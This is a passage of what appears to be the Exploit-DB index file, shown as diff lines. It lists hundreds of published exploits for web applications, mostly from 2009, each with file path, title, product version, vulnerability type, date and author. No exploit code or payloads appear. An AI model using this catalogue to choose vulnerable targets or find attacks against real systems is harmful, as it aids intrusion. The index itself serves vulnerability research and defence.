Calin",webapps,php, +9876,exploits/php/webapps/9876.txt,"DeDeCMS 5.1 - SQL Injection",2009-10-14,"Securitylab Security Research",webapps,php, +9877,exploits/asp/webapps/9877.txt,"DWebPro - Command Injection",2009-10-17,"Rafael Sousa",webapps,asp, +9880,exploits/php/webapps/9880.txt,"eNdonesia CMS 8.4 - Local File Inclusion",2009-11-04,s4r4d0,webapps,php, +9885,exploits/windows/webapps/9885.txt,"httpdx 1.4.6b - Source Disclosure",2009-10-21,Dr_IDE,webapps,windows, +9887,exploits/jsp/webapps/9887.txt,"jetty 6.x < 7.x - Cross-Site Scripting / Information Disclosure / Injection",2009-10-26,"Antonion Parata",webapps,jsp, +9888,exploits/php/webapps/9888.txt,"Joomla! Component Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,webapps,php, +9889,exploits/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,webapps,php, +9890,exploits/php/webapps/9890.txt,"Joomla! Plugin JD-WordPress 2.0 RC2 - Remote File Inclusion",2009-10-19,"Don Tukulesto",webapps,php, +9891,exploits/php/webapps/9891.txt,"Joomla! Component Jshop - SQL Injection",2009-10-23,"Don Tukulesto",webapps,php, +9892,exploits/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection",2009-10-23,kaMtiEz,webapps,php, +9897,exploits/php/webapps/9897.txt,"Mongoose Web Server 2.8 - Source Disclosure",2009-10-23,Dr_IDE,webapps,php, +9898,exploits/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",webapps,multiple, +9903,exploits/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",webapps,php, +9904,exploits/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",webapps,asp, +9906,exploits/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,webapps,php, +9907,exploits/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include",1999-11-05,patrick,webapps,cgi, +9908,exploits/php/webapps/9908.rb,"BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)",2008-06-14,MC,webapps,php, +9909,exploits/cgi/webapps/9909.rb,"AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,webapps,cgi, +9911,exploits/php/webapps/9911.rb,"Cacti 0.8.6-d - 'graph_view.php' Command Injection (Metasploit)",2005-01-15,"David Maciejak",webapps,php, +9912,exploits/cgi/webapps/9912.rb,"AWStats 6.2 < 6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",webapps,cgi, +9916,exploits/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,webapps,multiple, +9922,exploits/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,webapps,php, +9926,exploits/php/webapps/9926.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Execution",2009-07-22,spinbad,webapps,php, +9933,exploits/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",webapps,php, +9958,exploits/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,webapps,jsp, +9961,exploits/php/webapps/9961.txt,"phpCMS 2008 - File Disclosure",2009-10-19,"Securitylab Security Research",webapps,php, +16007,exploits/php/webapps/16007.txt,"AneCMS 1.3 - Persistent Cross-Site Scripting",2011-01-17,Penguin,webapps,php, +9962,exploits/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,webapps,php, +9963,exploits/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",webapps,asp, +9964,exploits/php/webapps/9964.txt,"RunCMS 2m1 - 'store()' SQL Injection",2009-10-26,bookoo,webapps,php, +9965,exploits/php/webapps/9965.txt,"RunCMS 2ma - 'post.php' SQL Injection",2009-10-26,bookoo,webapps,php, +9967,exploits/asp/webapps/9967.txt,"SharePoint 2007 - Team Services Source Code Disclosure",2009-10-26,"Daniel Martin",webapps,asp, +33434,exploits/windows/webapps/33434.rb,"HP Release Control - Authenticated XML External Entity (Metasploit)",2014-05-19,"Brandon Perry",webapps,windows,80 +9975,exploits/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",webapps,hardware,80 +9978,exploits/php/webapps/9978.txt,"TwonkyMedia Server 4.4.17/5.0.65 - Cross-Site Scripting",2009-10-23,"Davide Canali",webapps,php, +9979,exploits/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 - file Disclosure",2009-10-22,"Janek Vind",webapps,php, +9981,exploits/hardware/webapps/9981.txt,"Websense Email Security - Cross-Site Scripting",2009-10-20,"Nikolas Sotiriu",webapps,hardware, +10002,exploits/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews - Multiple Vulnerabilities",2009-11-10,"Andrew Horton",webapps,php, +10003,exploits/php/webapps/10003.txt,"Docebo 3.6.0.3 - Multiple SQL Injections",2009-10-09,"Andrea Fabrizi",webapps,php, +10006,exploits/php/webapps/10006.txt,"DreamPoll 3.1 - SQL Injection",2009-10-08,"Mark from infosecstuff",webapps,php, +10012,exploits/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,webapps,multiple, +10013,exploits/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-02,CoreLabs,webapps,jsp, +10016,exploits/php/webapps/10016.pl,"Joomla! Component JForJoomla! Jreservation 1.5 - 'pid' SQL Injection",2009-11-10,"Chip d3 bi0s",webapps,php, +10031,exploits/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 - masterCGI Command Injection (Metasploit)",2007-09-17,patrick,webapps,cgi,443 +10042,exploits/php/webapps/10042.txt,"Achievo 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",webapps,php, +10043,exploits/php/webapps/10043.txt,"redcat media - SQL Injection",2009-10-02,s4va,webapps,php, +10045,exploits/php/webapps/10045.txt,"Community Translate - Remote File Inclusion",2009-10-12,NoGe,webapps,php, +10046,exploits/php/webapps/10046.txt,"Dazzle Blast - Remote File Inclusion",2009-10-12,NoGe,webapps,php, +10049,exploits/php/webapps/10049.pl,"EZsneezyCal CMS 95.1-95.2 - Remote File Inclusion",2009-10-12,kaMtiEz,webapps,php, +10050,exploits/php/webapps/10050.pl,"EZRecipeZee CMS 91 - Remote File Inclusion",2009-10-12,kaMtiEz,webapps,php, +10051,exploits/php/webapps/10051.txt,"QuickCart 3.x - Cross-Site Scripting / Cross-Site Request Forgery / Local File Inclusion / Directory Traversal",2009-10-08,kl3ryk,webapps,php, +10052,exploits/php/webapps/10052.txt,"The BMW - 'inventory.php' SQL Injection",2009-10-08,Dazz,webapps,php, +10057,exploits/php/webapps/10057.txt,"AIOCP 1.4.001 - Remote File Inclusion",2009-10-07,"Hadi Kiamarsi",webapps,php, +10058,exploits/php/webapps/10058.pl,"Joomla! Component Recerca - SQL Injection",2009-10-07,"Don Tukulesto",webapps,php, +10059,exploits/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure",2009-11-12,"Daniel King",webapps,jsp, +10061,exploits/jsp/webapps/10061.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-12,"Daniel King",webapps,jsp, +10064,exploits/php/webapps/10064.txt,"Joomla! Component CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,webapps,php, +10067,exploits/php/webapps/10067.txt,"Joomla! Component Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,webapps,php, +10069,exploits/php/webapps/10069.php,"Empire CMS 47 - SQL Injection",2009-10-05,"Securitylab Security Research",webapps,php, +10074,exploits/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",webapps,novell,8030 +10075,exploits/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - Cross-Site Scripting",2009-09-23,"Francis Provencher",webapps,novell,8030 +33477,exploits/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Remote File Inclusion",2010-01-07,Saywhat,webapps,php, +33428,exploits/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 < 7.4 / Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",webapps,windows,7002 +10082,exploits/php/webapps/10082.txt,"PBBoard 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,webapps,php, +10085,exploits/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",webapps,jsp, +10088,exploits/php/webapps/10088.txt,"WordPress 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",webapps,php, +10089,exploits/php/webapps/10089.txt,"WordPress < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",webapps,php, +10090,exploits/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - '/wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",webapps,php, +10094,exploits/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,IBM,webapps,jsp, +10096,exploits/php/webapps/10096.txt,"OS Commerce 2.2r2 - Authentication Bypass",2009-11-13,"Stuart Udall",webapps,php, +10101,exploits/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,webapps,php, +10105,exploits/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,webapps,php, +40083,exploits/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",webapps,php,80 +10161,exploits/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration Panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,webapps,asp, +10165,exploits/php/webapps/10165.txt,"TelebidAuctionScript - 'aid' Blind SQL Injection",2009-11-17,"Hussin X",webapps,php, +10166,exploits/asp/webapps/10166.txt,"ActiveTrade 2.0 - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",webapps,asp, +10167,exploits/asp/webapps/10167.txt,"ActiveBids - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",webapps,asp, +10168,exploits/php/webapps/10168.txt,"Shoutbox 1.0 - HTML / Cross-Site Scripting Injection",2009-11-18,SkuLL-HackeR,webapps,php, +10169,exploits/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",webapps,php, +10170,exploits/multiple/webapps/10170.txt,"Xerver 4.31/4.32 - HTTP Response Splitting",2009-11-18,s4squatch,webapps,multiple,80 +10177,exploits/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",webapps,php, +10178,exploits/php/webapps/10178.txt,"Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,webapps,php, +10180,exploits/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",webapps,php, +10181,exploits/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",webapps,php, +10183,exploits/php/webapps/10183.php,"Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)",2009-11-19,daath,webapps,php,80 +10189,exploits/php/webapps/10189.txt,"Betsy CMS versions 3.5 - Local File Inclusion",2009-11-21,MizoZ,webapps,php, +10192,exploits/php/webapps/10192.txt,"Joomla! Component Com_Joomclip - 'cat' SQL Injection",2009-11-21,"599eme Man",webapps,php, +10209,exploits/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",webapps,multiple, +40303,exploits/cgi/webapps/40303.sh,"Intellinet IP Camera INT-L100M20N - Unauthorized Admin Credential Change",2016-08-29,"Todor Donev",webapps,cgi,80 +40304,exploits/cgi/webapps/40304.txt,"PLC Wireless Router GPN2.4P21-C-CN - Arbitrary File Disclosure",2016-08-29,"Rahul Raz",webapps,cgi,80 +10214,exploits/php/webapps/10214.txt,"Joomla! Component mygallery - 'farbinform_krell' SQL Injection",2009-11-23,"Manas58 BAYBORA",webapps,php, +10216,exploits/php/webapps/10216.txt,"kr-web 1.1b2 - Remote File Inclusion",2009-11-24,cr4wl3r,webapps,php, +10217,exploits/php/webapps/10217.txt,"NukeHall 0.3 - Multiple Remote File Inclusions",2009-11-24,cr4wl3r,webapps,php, +10218,exploits/php/webapps/10218.txt,"outreach project tool 1.2.6 - Remote File Inclusion",2009-11-24,cr4wl3r,webapps,php, +10219,exploits/php/webapps/10219.txt,"phptraverse 0.8.0 - Remote File Inclusion",2009-11-24,cr4wl3r,webapps,php, +10220,exploits/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,cr4wl3r,webapps,php, +10222,exploits/php/webapps/10222.txt,"W3infotech - Authentication Bypass",2009-11-24,ViRuS_HiMa,webapps,php, +10224,exploits/php/webapps/10224.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",webapps,php, +10225,exploits/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,webapps,windows,1000 +10227,exploits/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' SQL Injection",2009-11-25,S@BUN,webapps,php, +10228,exploits/php/webapps/10228.txt,"WordPress Plugin WP-Cumulus 1.20 - Full Path Disclosure / Cross-Site Scripting",2009-11-25,MustLive,webapps,php, +10230,exploits/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,webapps,php, +10231,exploits/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",webapps,php, +10232,exploits/php/webapps/10232.txt,"Joomla! Component com_gcalendar 1.1.2 - 'gcid' SQL Injection",2009-11-25,"Yogyacarderlink Crew",webapps,php, +10233,exploits/php/webapps/10233.txt,"phpBazar-2.1.1fix - Remote Administration-Panel",2009-11-25,"kurdish hackers team",webapps,php, +10234,exploits/php/webapps/10234.txt,"Cacti 0.8.7e - Multiple Vulnerabilities",2009-11-26,"Moritz Naumann",webapps,php, +10236,exploits/php/webapps/10236.txt,"Flashden - Multiple Arbitrary File Uploads",2009-11-26,DigitALL,webapps,php, +10238,exploits/php/webapps/10238.txt,"Joomla! Component com_lyftenbloggie 1.04 - SQL Injection",2009-11-28,kaMtiEz,webapps,php, +10241,exploits/php/webapps/10241.txt,"Uploaderr 1.0 File Hosting Script - Arbitrary File Upload",2009-11-28,DigitALL,webapps,php, +10245,exploits/php/webapps/10245.txt,"phpBazar 2.1.1fix - 'cid' SQL Injection",2009-11-28,MizoZ,webapps,php, +10246,exploits/php/webapps/10246.txt,"SweetRice 0.5.3 - Remote File Inclusion",2009-11-29,cr4wl3r,webapps,php, +10247,exploits/hardware/webapps/10247.txt,"Micronet SP1910 Data Access Controller UI - Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,webapps,hardware, +10248,exploits/php/webapps/10248.txt,"Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,webapps,php, +10249,exploits/php/webapps/10249.txt,"AdaptCMS Lite 1.5 - Remote File Inclusion",2009-11-29,v3n0m,webapps,php, +10250,exploits/php/webapps/10250.txt,"Joomla! Component MusicGallery - SQL Injection",2009-11-30,"Don Tukulesto",webapps,php, +10252,exploits/php/webapps/10252.txt,"Joomla! Component Quick News - SQL Injection",2009-11-30,"Don Tukulesto",webapps,php, +10253,exploits/asp/webapps/10253.txt,"Eshopbuilde CMS - SQL Injection",2009-11-30,Isfahan,webapps,asp, +10254,exploits/asp/webapps/10254.txt,"Xxasp 3.3.2 - SQL Injection",2009-11-30,Secu_lab_ir,webapps,asp, +10256,exploits/php/webapps/10256.txt,"WordPress Plugin WP-Polls 2.x - Incorrect Flood Filter",2009-11-30,Jbyte,webapps,php, +10259,exploits/php/webapps/10259.txt,"Ciamos CMS 0.9.5 - 'module_path' Remote File Inclusion",2009-12-01,cr4wl3r,webapps,php, +10260,exploits/php/webapps/10260.txt,"Robert Zimmerman PHP / MySQL Scripts - Authentication Bypass",2009-12-01,DUNDEE,webapps,php, +10261,exploits/linux/webapps/10261.txt,"dotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",webapps,linux,80 +10262,exploits/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure",2009-12-01,cr4wl3r,webapps,linux,80 +10263,exploits/linux/webapps/10263.txt,"Quate CMS 0.3.5 - Local/Remote File Inclusion",2009-12-01,cr4wl3r,webapps,linux,80 +10272,exploits/php/webapps/10272.txt,"Joomla! Component Joaktree 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",webapps,php, +10273,exploits/php/webapps/10273.txt,"Joomla! Component MojoBlog 0.15 - Multiple Remote File Inclusions",2009-12-01,kaMtiEz,webapps,php, +10274,exploits/php/webapps/10274.txt,"Simple Machines Forum (SMF) 1.1.10/2.0 RC2 - Multiple Vulnerabilities",2009-12-02,"SimpleAudit Team",webapps,php, +10275,exploits/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - Cross-Site Scripting / AXFR",2009-12-02,andresg888,webapps,php, +10276,exploits/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,webapps,hardware, +10277,exploits/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusions",2009-12-03,cr4wl3r,webapps,php, +10284,exploits/php/webapps/10284.txt,"ita-forum 5.1.32 - SQL Injection",2009-11-30,BAYBORA,webapps,php, +10285,exploits/php/webapps/10285.txt,"Public Media Manager - Remote File Inclusion",2009-12-01,cr4wl3r,webapps,php, +10286,exploits/php/webapps/10286.txt,"OpenCSP - Multiple Remote File Inclusions",2009-11-25,EANgel,webapps,php, +10287,exploits/php/webapps/10287.txt,"MundiMail 0.8.2 - Remote Code Execution",2009-09-07,Dedalo,webapps,php, +10288,exploits/php/webapps/10288.txt,"SAPID SHOP 1.3 - Remote File Inclusion",2009-12-03,cr4wl3r,webapps,php, +10289,exploits/php/webapps/10289.txt,"Power BB 1.8.3 - Remote File Inclusions",2009-11-25,DigitALL,webapps,php, +10290,exploits/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,webapps,php, +10291,exploits/php/webapps/10291.txt,"Joomla! Component ProofReader 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,webapps,php, +10292,exploits/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,webapps,multiple, +10293,exploits/php/webapps/10293.txt,"PHP-Nuke 8.0 - News Module Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,webapps,php, +10294,exploits/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",webapps,php, +10297,exploits/php/webapps/10297.php,"Vivid Ads Shopping Cart - 'prodid' SQL Injection",2009-12-03,"Yakir Wizman",webapps,php, +10299,exploits/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX & Cr3W-DZ",webapps,php, +10302,exploits/php/webapps/10302.txt,"427BB 2.3.2 - SQL Injection",2009-12-04,cr4wl3r,webapps,php, +10304,exploits/php/webapps/10304.txt,"Invision Power Board 2.3.6/3.0.4 - Local File Inclusion / SQL Injection",2009-12-04,"Dawid Golunski",webapps,php, +10305,exploits/php/webapps/10305.txt,"UBBCentral UBB.Threads 7.5.4 2 - Multiple File Inclusions",2009-12-04,R3VAN_BASTARD,webapps,php, +10306,exploits/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",webapps,php, +10307,exploits/php/webapps/10307.txt,"Achievo 1.4.2 - Persistent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",webapps,php, +10312,exploits/php/webapps/10312.php,"Joomla! Component com_joomgallery 1.5.x - &func Incorrect Flood Filter",2009-12-04,Jbyte,webapps,php, +10314,exploits/php/webapps/10314.txt,"BM Classifieds Ads - SQL Injection",2009-12-04,"Dr.0rYX & Cr3W-DZ",webapps,php, +10318,exploits/php/webapps/10318.txt,"Joomla! Component yt_color YOOOtheme - Cross-Site Scripting / Cookie Stealing",2009-12-04,andresg888,webapps,php,80 +10324,exploits/php/webapps/10324.txt,"phpShop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",webapps,php, +10325,exploits/php/webapps/10325.txt,"WordPress Plugin Image Manager - Arbitrary File Upload",2009-12-05,DigitALL,webapps,php, +10329,exploits/php/webapps/10329.txt,"AROUNDMe 1.1 - 'language_path' Remote File Inclusion",2009-12-06,cr4wl3r,webapps,php, +10330,exploits/php/webapps/10330.txt,"Elkagroup - SQL Injection",2009-12-06,SadHaCkEr,webapps,php, +10331,exploits/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Traversal",2009-12-06,mr_me,webapps,windows, +10337,exploits/php/webapps/10337.txt,"Chipmunk NewsLetter - Persistent Cross-Site Scripting",2009-12-07,mr_me,webapps,php, +10341,exploits/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusions",2009-12-07,cr4wl3r,webapps,php, +10347,exploits/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 - Multiple Vulnerabilities",2009-12-07,Global-Evolution,webapps,hardware, +10350,exploits/php/webapps/10350.txt,"IRAN N.E.T E-Commerce Group - SQL Injection",2009-12-08,"Dr.0rYX & Cr3W-DZ",webapps,php, +10351,exploits/php/webapps/10351.txt,"MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-12-07,"Amol Naik",webapps,php, +10354,exploits/php/webapps/10354.txt,"Viscacha 0.8 Gold - Persistent Cross-Site Scripting",2009-12-08,mr_me,webapps,php, +10356,exploits/php/webapps/10356.txt,"Joomla! Component com_job - 'showMoreUse' SQL Injection",2009-12-08,Palyo34,webapps,php, +10357,exploits/php/webapps/10357.txt,"Alqatari group 1.0 < 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,webapps,php, +10358,exploits/php/webapps/10358.txt,"AlefMentor 2.0 < 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,webapps,php, +10361,exploits/php/webapps/10361.txt,"Real Estate Portal X.0 - Authentication Bypass",2009-12-09,"AnTi SeCuRe",webapps,php, +10364,exploits/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities",2009-12-09,"Core Security",webapps,php, +10366,exploits/php/webapps/10366.txt,"Joomla! Component com_jsjobs 1.0.5.6 - SQL Injection",2009-12-10,kaMtiEz,webapps,php, +10367,exploits/php/webapps/10367.txt,"Joomla! Component com_jphoto - 'id' SQL Injection",2009-12-10,kaMtiEz,webapps,php, +10368,exploits/asp/webapps/10368.txt,"Free ASP Upload - Arbitrary File Upload",2009-12-10,Mr.aFiR,webapps,asp, +10369,exploits/php/webapps/10369.txt,"Joomla! Component Mamboleto 2.0 RC3 - Remote File Inclusion",2009-12-10,"Don Tukulesto",webapps,php, +10370,exploits/php/webapps/10370.txt,"PHP Inventory 1.2 - Authentication Bypass",2009-12-10,mr_me,webapps,php, +10372,exploits/aix/webapps/10372.txt,"OPMANAGER - Blind SQL Injection / XPath Injection",2009-12-10,"Asheesh kumar Mani Tripathi",webapps,aix, +10376,exploits/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,webapps,windows,80 +10378,exploits/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",webapps,php, +10379,exploits/php/webapps/10379.txt,"oBlog - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Brute Force",2009-12-11,"Milos Zivanovic",webapps,php, +10383,exploits/php/webapps/10383.txt,"Digital Scribe 1.4.1 - Multiple SQL Injections",2009-12-11,"Salvatore Fresta",webapps,php, +10384,exploits/php/webapps/10384.txt,"E-Store - SQL Injection",2009-12-11,"Salvatore Fresta",webapps,php, +10386,exploits/solaris/webapps/10386.txt,"Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities",2005-05-07,"Thomas Liam Romanis",webapps,solaris, +10388,exploits/php/webapps/10388.txt,"Chipmunk NewsLetter - Cross-Site Request Forgery",2009-12-11,"Milos Zivanovic",webapps,php, +10389,exploits/php/webapps/10389.txt,"Illogator Shop - SQL Injection Bypass",2009-12-11,bi0,webapps,php, +10390,exploits/php/webapps/10390.txt,"phpCollegeExchange 0.1.5c - Multiple SQL Injections",2009-12-11,"Salvatore Fresta",webapps,php, +10391,exploits/php/webapps/10391.txt,"XAMPP 1.7.2 - Change Administrative Password",2009-12-11,bi0,webapps,php, +10393,exploits/php/webapps/10393.txt,"B2C Booking Centre Systems - SQL Injection",2009-12-11,"Salvatore Fresta",webapps,php, +14948,exploits/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,webapps,php, +10395,exploits/php/webapps/10395.txt,"Miniweb 2.0 - Full Path Disclosure",2009-12-12,"Salvatore Fresta",webapps,php, +10398,exploits/php/webapps/10398.txt,"ZeeCareers 2.x - PHP HR Manager Website (Cross-Site Scripting / Authentication Bypass)",2009-12-12,bi0,webapps,php, +10400,exploits/php/webapps/10400.txt,"Acc Auto Dealer Script 5.0 - Persistent Cross-Site Scripting / SQL Backup",2009-12-13,bi0,webapps,php, +10403,exploits/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,webapps,php, +10404,exploits/php/webapps/10404.txt,"Interspire Shopping Cart - Full Path Disclosure",2009-12-13,Mr.aFiR,webapps,php, +10406,exploits/php/webapps/10406.txt,"AccStatistics 1.1 - Cross-Site Request Forgery (Change Admin Settings)",2009-12-13,"Milos Zivanovic",webapps,php, +10407,exploits/php/webapps/10407.txt,"Joomla! Component com_virtuemart 1.0 - 'Product_ID' SQL Injection",2009-12-13,"SOA Crew",webapps,php, +10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php, +10410,exploits/php/webapps/10410.txt,"phpLDAPadmin - Local File Inclusion",2009-12-10,ipsecs,webapps,php, +10412,exploits/php/webapps/10412.txt,"Acc PHP eMail 1.1 - Cross-Site Request Forgery",2009-12-13,bi0,webapps,php, +10414,exploits/php/webapps/10414.txt,"Frog CMS 0.9.5 - Cross-Site Request Forgery",2009-12-13,"Milos Zivanovic",webapps,php, +10417,exploits/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,webapps,php, +10418,exploits/php/webapps/10418.txt,"Ele Medios CMS - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php, +10419,exploits/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-13,"Milos Zivanovic",webapps,php, +10420,exploits/php/webapps/10420.txt,"Ez Guestbook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php, +10421,exploits/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple Remote File Inclusions",2009-12-14,"1nd0n3s14n l4m3r",webapps,php, +10422,exploits/php/webapps/10422.txt,"eoCMS 0.9.03 - Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",webapps,php, +10424,exploits/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,webapps,multiple, +10425,exploits/asp/webapps/10425.txt,"Quartz Concept Content Manager 3.00 - Authentication Bypass",2009-12-14,Mr.aFiR,webapps,asp, +10426,exploits/linux/webapps/10426.txt,"[WS] upload - Arbitrary File Upload",2009-12-14,ViRuSMaN,webapps,linux,80 +10427,exploits/linux/webapps/10427.txt,"Digital Hive - Multiple Vulnerabilities",2009-12-14,ViRuSMaN,webapps,linux,80 +10428,exploits/windows/webapps/10428.txt,"Maxs AJAX File Uploader - Arbitrary File Upload",2009-12-14,ViRuSMaN,webapps,windows,80 +10429,exploits/linux/webapps/10429.txt,"myPHPupload 0.5.1 - Arbitrary File Upload",2009-12-14,ViRuSMaN,webapps,linux,80 +10430,exploits/linux/webapps/10430.txt,"NAS Uploader 1.0/1.5 - Arbitrary File Upload",2009-12-14,ViRuSMaN,webapps,linux,80 +10431,exploits/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 - Remote 